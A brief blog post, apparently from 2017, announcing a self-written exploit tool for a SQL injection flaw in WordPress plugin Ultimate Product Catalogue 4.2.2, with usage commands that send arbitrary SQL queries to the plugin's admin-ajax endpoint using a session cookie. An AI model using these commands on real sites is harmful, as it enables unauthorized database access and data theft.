Some days ago, a sql injection vulnerability in wp plugin ultimate product catalogue 4.2.2 was released. You can see the detail here.

Based on the paper, i wrote a simple tool to exploit the vulnerability. You can download the script here.


How to use

./ -u http://mywp/wp-admin/admin-ajax.php?action=get_upcp_subcategories -c “mycookie”

Screenshot from 2017-07-05 11-42-23

./ -u http://mywp/wp-admin/admin-ajax.php?action=get_upcp_subcategories -c “mycookie” -q “SELECT user(),database()”

Screenshot from 2017-07-05 11-43-14